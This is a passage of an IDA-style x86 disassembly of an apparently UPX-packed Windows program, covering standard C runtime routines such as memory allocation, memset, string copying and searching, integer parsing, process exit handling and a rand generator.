call sub_41B513
test eax, eax
pop ecx
jnz short locret_41B512
cmp [esp+arg_4], eax
jz short locret_41B512
push [esp+arg_0]
call sub_41F312
test eax, eax
pop ecx
jnz short loc_41B4EE
loc_41B510: ; CODE XREF: sub_41B4E7+5�j
xor eax, eax
locret_41B512: ; CODE XREF: sub_41B4E7+13�j
; sub_41B4E7+19�j
retn
sub_41B4E7 endp
; =============== S U B R O U T I N E =======================================
sub_41B513 proc near ; CODE XREF: sub_41B4E7+B�p
arg_0 = dword ptr 4
mov eax, ds:dword_4DCFE8
push esi
mov esi, [esp+4+arg_0]
cmp eax, 3
jnz short loc_41B537
cmp esi, ds:dword_4DCFE0
ja short loc_41B569
push esi
call sub_41E1CB
test eax, eax
pop ecx
jz short loc_41B569
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B537: ; CODE XREF: sub_41B513+D�j
cmp eax, 2
jnz short loc_41B569
mov eax, [esp+4+arg_0]
test eax, eax
jz short loc_41B54C
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_41B54F
; ---------------------------------------------------------------------------
loc_41B54C: ; CODE XREF: sub_41B513+2F�j
push 10h
pop esi
loc_41B54F: ; CODE XREF: sub_41B513+37�j
cmp esi, dword_43C9D4
ja short loc_41B576
mov eax, esi
shr eax, 4
push eax
call sub_41EC6E
test eax, eax
pop ecx
jnz short loc_41B585
jmp short loc_41B576
; ---------------------------------------------------------------------------
loc_41B569: ; CODE XREF: sub_41B513+15�j
; sub_41B513+20�j ...
test esi, esi
jnz short loc_41B570
push 1
pop esi
loc_41B570: ; CODE XREF: sub_41B513+58�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_41B576: ; CODE XREF: sub_41B513+42�j
; sub_41B513+54�j
push esi
push 0
push ds:dword_4DCFE4
call dword_427144 ; RtlAllocateHeap
loc_41B585: ; CODE XREF: sub_41B513+52�j
pop esi
retn
sub_41B513 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41B590 proc near ; CODE XREF: sub_40111D+3C�p
; sub_40111D+4A�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_41B5E3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_41B5D7
neg ecx
and ecx, 3
jz short loc_41B5B9
sub edx, ecx
loc_41B5B3: ; CODE XREF: sub_41B590+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_41B5B3
loc_41B5B9: ; CODE XREF: sub_41B590+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_41B5D7
rep stosd
test edx, edx
jz short loc_41B5DD
loc_41B5D7: ; CODE XREF: sub_41B590+18�j
; sub_41B590+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_41B5D7
loc_41B5DD: ; CODE XREF: sub_41B590+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41B5E3: ; CODE XREF: sub_41B590+A�j
mov eax, [esp+arg_0]
retn
sub_41B590 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41B5F0 proc near ; CODE XREF: sub_401221+49F�p
; sub_401221+4BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_41B673
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_41B614
shr ecx, 2
jnz short loc_41B681
jmp short loc_41B635
; ---------------------------------------------------------------------------
loc_41B614: ; CODE XREF: sub_41B5F0+1B�j
; sub_41B5F0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_41B642
test al, al
jz short loc_41B64A
test esi, 3
jnz short loc_41B614
mov ebx, ecx
shr ecx, 2
jnz short loc_41B681
loc_41B630: ; CODE XREF: sub_41B5F0+8F�j
and ebx, 3
jz short loc_41B642
loc_41B635: ; CODE XREF: sub_41B5F0+22�j
; sub_41B5F0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_41B66E
dec ebx
jnz short loc_41B635
loc_41B642: ; CODE XREF: sub_41B5F0+2B�j
; sub_41B5F0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41B64A: ; CODE XREF: sub_41B5F0+2F�j
test edi, 3
jz short loc_41B664
loc_41B652: ; CODE XREF: sub_41B5F0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_41B6E6
test edi, 3
jnz short loc_41B652
loc_41B664: ; CODE XREF: sub_41B5F0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_41B6D7
loc_41B66B: ; CODE XREF: sub_41B5F0+7F�j
; sub_41B5F0+F4�j
mov [edi], al
inc edi
loc_41B66E: ; CODE XREF: sub_41B5F0+4D�j
dec ebx
jnz short loc_41B66B
pop ebx
pop esi
loc_41B673: ; CODE XREF: sub_41B5F0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41B679: ; CODE XREF: sub_41B5F0+A9�j
; sub_41B5F0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_41B630
loc_41B681: ; CODE XREF: sub_41B5F0+20�j
; sub_41B5F0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_41B679
test dl, dl
jz short loc_41B6CB
test dh, dh
jz short loc_41B6C1
test edx, 0FF0000h
jz short loc_41B6B7
test edx, 0FF000000h
jnz short loc_41B679
mov [edi], edx
jmp short loc_41B6CF
; ---------------------------------------------------------------------------
loc_41B6B7: ; CODE XREF: sub_41B5F0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_41B6CF
; ---------------------------------------------------------------------------
loc_41B6C1: ; CODE XREF: sub_41B5F0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_41B6CF
; ---------------------------------------------------------------------------
loc_41B6CB: ; CODE XREF: sub_41B5F0+AD�j
xor edx, edx
mov [edi], edx
loc_41B6CF: ; CODE XREF: sub_41B5F0+C5�j
; sub_41B5F0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_41B6E1
loc_41B6D7: ; CODE XREF: sub_41B5F0+79�j
xor eax, eax
loc_41B6D9: ; CODE XREF: sub_41B5F0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_41B6D9
loc_41B6E1: ; CODE XREF: sub_41B5F0+E5�j
and ebx, 3
jnz short loc_41B66B
loc_41B6E6: ; CODE XREF: sub_41B5F0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_41B5F0 endp
; =============== S U B R O U T I N E =======================================
sub_41B6EE proc near ; CODE XREF: sub_41B779+4�p
; sub_4247EC+1A2�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_41B6F6: ; CODE XREF: sub_41B6EE+34�j
cmp dword_43CBE4, 1
jle short loc_41B70E
movzx eax, byte ptr [edi]
push 8
push eax
call sub_41F515
pop ecx
pop ecx
jmp short loc_41B71D
; ---------------------------------------------------------------------------
loc_41B70E: ; CODE XREF: sub_41B6EE+F�j
movzx eax, byte ptr [edi]
mov ecx, off_43C9D8
mov al, [ecx+eax*2]
and eax, 8
loc_41B71D: ; CODE XREF: sub_41B6EE+1E�j
test eax, eax
jz short loc_41B724
inc edi
jmp short loc_41B6F6
; ---------------------------------------------------------------------------
loc_41B724: ; CODE XREF: sub_41B6EE+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_41B734
cmp esi, 2Bh
jnz short loc_41B738
loc_41B734: ; CODE XREF: sub_41B6EE+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_41B738: ; CODE XREF: sub_41B6EE+44�j
xor ebx, ebx
loc_41B73A: ; CODE XREF: sub_41B6EE+7B�j
cmp dword_43CBE4, 1
jle short loc_41B74F
push 4
push esi
call sub_41F515
pop ecx
pop ecx
jmp short loc_41B75A
; ---------------------------------------------------------------------------
loc_41B74F: ; CODE XREF: sub_41B6EE+53�j
mov eax, off_43C9D8
mov al, [eax+esi*2]
and eax, 4
loc_41B75A: ; CODE XREF: sub_41B6EE+5F�j
test eax, eax
jz short loc_41B76B
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_41B73A
; ---------------------------------------------------------------------------
loc_41B76B: ; CODE XREF: sub_41B6EE+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_41B774
neg eax
loc_41B774: ; CODE XREF: sub_41B6EE+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41B6EE endp
; =============== S U B R O U T I N E =======================================
sub_41B779 proc near ; CODE XREF: sub_401221+306�p
; sub_401ACD+733�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41B6EE
pop ecx
retn
sub_41B779 endp
; =============== S U B R O U T I N E =======================================
sub_41B784 proc near ; CODE XREF: UPX0:0041D9C6�p
mov eax, off_43A97C
test eax, eax
jz short loc_41B78F
call eax ; sub_41C748
loc_41B78F: ; CODE XREF: sub_41B784+7�j
push offset dword_42902C
push offset dword_429018
call sub_41B86C
push offset dword_429014
push offset dword_429000
call sub_41B86C
add esp, 10h
retn
sub_41B784 endp
; =============== S U B R O U T I N E =======================================
sub_41B7B1 proc near ; CODE XREF: UPX0:0041DA05�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_41B7D3
add esp, 0Ch
retn
sub_41B7B1 endp
; =============== S U B R O U T I N E =======================================
sub_41B7C2 proc near ; CODE XREF: UPX0:0041DA24�p
; sub_41DA29+1C�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_41B7D3
add esp, 0Ch
retn
sub_41B7C2 endp
; =============== S U B R O U T I N E =======================================
sub_41B7D3 proc near ; CODE XREF: sub_41B7B1+8�p
; sub_41B7C2+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp ds:dword_4DB9A0, edi
jnz short loc_41B7F0
push [esp+4+arg_0]
call dword_4270F8 ; GetCurrentProcess
push eax
call dword_4270F0 ; TerminateProcess
loc_41B7F0: ; CODE XREF: sub_41B7D3+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov ds:dword_4DB99C, edi
mov ds:byte_4DB998, bl
jnz short loc_41B844
mov eax, ds:dword_4DCFFC
test eax, eax
jz short loc_41B833
mov ecx, ds:dword_4DCFF8
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_41B832
loc_41B81F: ; CODE XREF: sub_41B7D3+5D�j
mov eax, [esi]
test eax, eax
jz short loc_41B827
call eax
loc_41B827: ; CODE XREF: sub_41B7D3+50�j
sub esi, 4
cmp esi, ds:dword_4DCFFC
jnb short loc_41B81F
loc_41B832: ; CODE XREF: sub_41B7D3+4A�j
pop esi
loc_41B833: ; CODE XREF: sub_41B7D3+3C�j
push offset dword_429038
push offset dword_429030
call sub_41B86C
pop ecx
pop ecx
loc_41B844: ; CODE XREF: sub_41B7D3+33�j
push offset dword_429044
push offset dword_42903C
call sub_41B86C
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_41B86A
push [esp+4+arg_0]
mov ds:dword_4DB9A0, edi
call dword_427064 ; ExitProcess
loc_41B86A: ; CODE XREF: sub_41B7D3+85�j
pop edi
retn
sub_41B7D3 endp
; =============== S U B R O U T I N E =======================================
sub_41B86C proc near ; CODE XREF: sub_41B784+15�p
; sub_41B784+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_41B871: ; CODE XREF: sub_41B86C+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_41B884
mov eax, [esi]
test eax, eax
jz short loc_41B87F
call eax
loc_41B87F: ; CODE XREF: sub_41B86C+F�j
add esi, 4
jmp short loc_41B871
; ---------------------------------------------------------------------------
loc_41B884: ; CODE XREF: sub_41B86C+9�j
pop esi
retn
sub_41B86C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B886 proc near ; CODE XREF: sub_401221+18F�p
; sub_401221+295�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_41F69F
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41B8C6
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41B8D3
; ---------------------------------------------------------------------------
loc_41B8C6: ; CODE XREF: sub_41B886+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41F58A
pop ecx
pop ecx
loc_41B8D3: ; CODE XREF: sub_41B886+3E�j
mov eax, esi
pop esi
leave
retn
sub_41B886 endp
; =============== S U B R O U T I N E =======================================
sub_41B8D8 proc near ; CODE XREF: sub_401221+45�p
; sub_401ACD+31A3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_43A960, eax
retn
sub_41B8D8 endp
; =============== S U B R O U T I N E =======================================
sub_41B8E2 proc near ; CODE XREF: sub_401221:loc_401379�p
; sub_401221:loc_4016A7�p ...
mov eax, dword_43A960
imul eax, 343FDh
add eax, 269EC3h
mov dword_43A960, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_41B8E2 endp
; =============== S U B R O U T I N E =======================================
sub_41B900 proc near ; CODE XREF: sub_401221+12D�p
; sub_401ACD+8C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_41B97A
mov dh, [ecx+1]
test dh, dh
jz short loc_41B967
loc_41B918: ; CODE XREF: sub_41B900+52�j
; sub_41B900+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_41B93A
test al, al
jz short loc_41B934
loc_41B929: ; CODE XREF: sub_41B900+32�j
mov al, [esi]
inc esi
loc_41B92C: ; CODE XREF: sub_41B900+3F�j
cmp al, dl
jz short loc_41B93A
test al, al
jnz short loc_41B929
loc_41B934: ; CODE XREF: sub_41B900+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41B93A: ; CODE XREF: sub_41B900+23�j
; sub_41B900+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_41B92C
lea edi, [esi-1]
loc_41B944: ; CODE XREF: sub_41B900+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_41B973
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_41B918
mov al, [ecx+3]
test al, al
jz short loc_41B973
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_41B944
jmp short loc_41B918
; ---------------------------------------------------------------------------
loc_41B967: ; CODE XREF: sub_41B900+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_41BFB6
; ---------------------------------------------------------------------------
loc_41B973: ; CODE XREF: sub_41B900+49�j
; sub_41B900+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_41B97A: ; CODE XREF: sub_41B900+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_41B900 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B980 proc near ; CODE XREF: sub_401221+11A�p
; sub_401ACD+1C73�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_41F69F
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41B9BF
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41B9CC
; ---------------------------------------------------------------------------
loc_41B9BF: ; CODE XREF: sub_41B980+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41F58A
pop ecx
pop ecx
loc_41B9CC: ; CODE XREF: sub_41B980+3D�j
mov eax, esi
pop esi
leave
retn
sub_41B980 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B9D1 proc near ; CODE XREF: sub_401221+F7�p
; sub_401ACD+21D2�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_41AFE0
cmp eax, 1
pop ecx
jb short loc_41BA0C
cmp byte ptr [ebx+1], 3Ah
jnz short loc_41BA0C
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_41BA08
push 2
push ebx
push esi
call sub_420289
add esp, 0Ch
and byte ptr [esi+2], 0
loc_41BA08: ; CODE XREF: sub_41B9D1+25�j
inc ebx
inc ebx
jmp short loc_41BA16
; ---------------------------------------------------------------------------
loc_41BA0C: ; CODE XREF: sub_41B9D1+18�j
; sub_41B9D1+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41BA16
and byte ptr [eax], 0
loc_41BA16: ; CODE XREF: sub_41B9D1+39�j
; sub_41B9D1+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_41BA8E
loc_41BA29: ; CODE XREF: sub_41B9D1+87�j
mov cl, [eax]
movzx edx, cl
test ds:byte_4DCEC1[edx], 4
jz short loc_41BA3A
inc eax
jmp short loc_41BA54
; ---------------------------------------------------------------------------
loc_41BA3A: ; CODE XREF: sub_41B9D1+64�j
cmp cl, 2Fh
jz short loc_41BA4E
cmp cl, 5Ch
jz short loc_41BA4E
cmp cl, 2Eh
jnz short loc_41BA54
mov [ebp+var_4], eax
jmp short loc_41BA54
; ---------------------------------------------------------------------------
loc_41BA4E: ; CODE XREF: sub_41B9D1+6C�j
; sub_41B9D1+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_41BA54: ; CODE XREF: sub_41B9D1+67�j
; sub_41B9D1+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_41BA29
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_41BA8E
cmp [ebp+arg_8], 0
jz short loc_41BA89
sub edi, ebx
cmp edi, esi
jb short loc_41BA72
mov edi, esi
loc_41BA72: ; CODE XREF: sub_41B9D1+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_420289
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_41BA89: ; CODE XREF: sub_41B9D1+97�j
mov ebx, [ebp+arg_4]
jmp short loc_41BA98
; ---------------------------------------------------------------------------
loc_41BA8E: ; CODE XREF: sub_41B9D1+56�j
; sub_41B9D1+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_41BA98
and byte ptr [ecx], 0
loc_41BA98: ; CODE XREF: sub_41B9D1+BB�j
; sub_41B9D1+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_41BAEB
cmp edi, ebx
jb short loc_41BAEB
cmp [ebp+arg_C], 0
jz short loc_41BAC8
sub edi, ebx
cmp edi, esi
jb short loc_41BAB1
mov edi, esi
loc_41BAB1: ; CODE XREF: sub_41B9D1+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_420289
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_41BAC8: ; CODE XREF: sub_41B9D1+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_41BB13
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_41BAD8
mov esi, eax
loc_41BAD8: ; CODE XREF: sub_41B9D1+103�j
push esi
push [ebp+var_4]
push edi
call sub_420289
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_41BB13
; ---------------------------------------------------------------------------
loc_41BAEB: ; CODE XREF: sub_41B9D1+CC�j
; sub_41B9D1+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_41BB09
sub eax, ebx
cmp eax, esi
jnb short loc_41BAFA
mov esi, eax
loc_41BAFA: ; CODE XREF: sub_41B9D1+125�j
push esi
push ebx
push edi
call sub_420289
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_41BB09: ; CODE XREF: sub_41B9D1+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_41BB13
and byte ptr [eax], 0
loc_41BB13: ; CODE XREF: sub_41B9D1+FC�j
; sub_41B9D1+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41B9D1 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BB20 proc near ; CODE XREF: sub_401955+8�p
; sub_401ACD+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_41BB40
loc_41BB2C: ; CODE XREF: sub_41BB20+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_41BB2C
loc_41BB40: ; CODE XREF: sub_41BB20+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_41BB20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB4F proc near ; CODE XREF: sub_401ACD+757F�p
; sub_401ACD+75AE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_41BB63
xor eax, eax
jmp short loc_41BB99
; ---------------------------------------------------------------------------
loc_41BB63: ; CODE XREF: sub_41BB4F+E�j
dec [ebp+arg_4]
push esi
jz short loc_41BB93
mov esi, [ebp+arg_8]
loc_41BB6C: ; CODE XREF: sub_41BB4F+42�j
dec dword ptr [esi+4]
js short loc_41BB7B
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_41BB82
; ---------------------------------------------------------------------------
loc_41BB7B: ; CODE XREF: sub_41BB4F+20�j
push esi
call sub_41F043
pop ecx
loc_41BB82: ; CODE XREF: sub_41BB4F+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_41BB9D
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_41BB93
dec [ebp+arg_4]
jnz short loc_41BB6C
loc_41BB93: ; CODE XREF: sub_41BB4F+18�j
; sub_41BB4F+3D�j ...
and byte ptr [edi], 0
loc_41BB96: ; CODE XREF: sub_41BB4F+55�j
mov eax, ebx
pop esi
loc_41BB99: ; CODE XREF: sub_41BB4F+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41BB9D: ; CODE XREF: sub_41BB4F+36�j
cmp edi, [ebp+arg_0]
jnz short loc_41BB93
xor ebx, ebx
jmp short loc_41BB96
sub_41BB4F endp
; =============== S U B R O U T I N E =======================================
sub_41BBA6 proc near ; CODE XREF: sub_41DC8A+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41BBBD
add esp, 10h
retn
sub_41BBA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBBD proc near ; CODE XREF: sub_41BBA6+E�p
; sub_41BDC5+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_41BBD5: ; CODE XREF: sub_41BBBD+46�j
cmp dword_43CBE4, 1
jle short loc_41BBED
movzx eax, bl
push 8
push eax
call sub_41F515
pop ecx
pop ecx
jmp short loc_41BBFC
; ---------------------------------------------------------------------------
loc_41BBED: ; CODE XREF: sub_41BBBD+1F�j
mov ecx, off_43C9D8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_41BBFC: ; CODE XREF: sub_41BBBD+2E�j
test eax, eax
jz short loc_41BC05
mov bl, [esi]
inc esi
jmp short loc_41BBD5
; ---------------------------------------------------------------------------
loc_41BC05: ; CODE XREF: sub_41BBBD+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_41BC13
or [ebp+arg_C], 2
jmp short loc_41BC18
; ---------------------------------------------------------------------------
loc_41BC13: ; CODE XREF: sub_41BBBD+4E�j
cmp bl, 2Bh
jnz short loc_41BC1E
loc_41BC18: ; CODE XREF: sub_41BBBD+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_41BC1E: ; CODE XREF: sub_41BBBD+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_41BDB5
cmp eax, 1
jz loc_41BDB5
cmp eax, 24h
jg loc_41BDB5
push 10h
test eax, eax
pop ecx
jnz short loc_41BC66
cmp bl, 30h
jz short loc_41BC50
mov [ebp+arg_8], 0Ah
jmp short loc_41BC82
; ---------------------------------------------------------------------------
loc_41BC50: ; CODE XREF: sub_41BBBD+88�j
mov al, [esi]
cmp al, 78h
jz short loc_41BC63
cmp al, 58h
jz short loc_41BC63
mov [ebp+arg_8], 8
jmp short loc_41BC82
; ---------------------------------------------------------------------------
loc_41BC63: ; CODE XREF: sub_41BBBD+97�j
; sub_41BBBD+9B�j
mov [ebp+arg_8], ecx
loc_41BC66: ; CODE XREF: sub_41BBBD+83�j
cmp [ebp+arg_8], ecx
jnz short loc_41BC82
cmp bl, 30h
jnz short loc_41BC82
mov al, [esi]
cmp al, 78h
jz short loc_41BC7A
cmp al, 58h
jnz short loc_41BC82
loc_41BC7A: ; CODE XREF: sub_41BBBD+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_41BC82: ; CODE XREF: sub_41BBBD+91�j
; sub_41BBBD+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_41BC92: ; CODE XREF: sub_41BBBD+16C�j
cmp dword_43CBE4, 1
movzx esi, bl
jle short loc_41BCAA
push 4
push esi
call sub_41F515
pop ecx
pop ecx
jmp short loc_41BCB5
; ---------------------------------------------------------------------------
loc_41BCAA: ; CODE XREF: sub_41BBBD+DF�j
mov eax, off_43C9D8
mov al, [eax+esi*2]
and eax, 4
loc_41BCB5: ; CODE XREF: sub_41BBBD+EB�j
test eax, eax
jz short loc_41BCC1
movsx ecx, bl
sub ecx, 30h
jmp short loc_41BCF3
; ---------------------------------------------------------------------------
loc_41BCC1: ; CODE XREF: sub_41BBBD+FA�j
cmp dword_43CBE4, 1
jle short loc_41BCD5
push edi
push esi
call sub_41F515
pop ecx
pop ecx
jmp short loc_41BCE0
; ---------------------------------------------------------------------------
loc_41BCD5: ; CODE XREF: sub_41BBBD+10B�j
mov eax, off_43C9D8
mov ax, [eax+esi*2]
and eax, edi
loc_41BCE0: ; CODE XREF: sub_41BBBD+116�j
test eax, eax
jz short loc_41BD2E
movsx eax, bl
push eax
call sub_420313
pop ecx
mov ecx, eax
sub ecx, 37h
loc_41BCF3: ; CODE XREF: sub_41BBBD+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_41BD2E
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_41BD18
jnz short loc_41BD12
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_41BD18
loc_41BD12: ; CODE XREF: sub_41BBBD+147�j
or [ebp+arg_C], 4
jmp short loc_41BD21
; ---------------------------------------------------------------------------
loc_41BD18: ; CODE XREF: sub_41BBBD+145�j
; sub_41BBBD+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
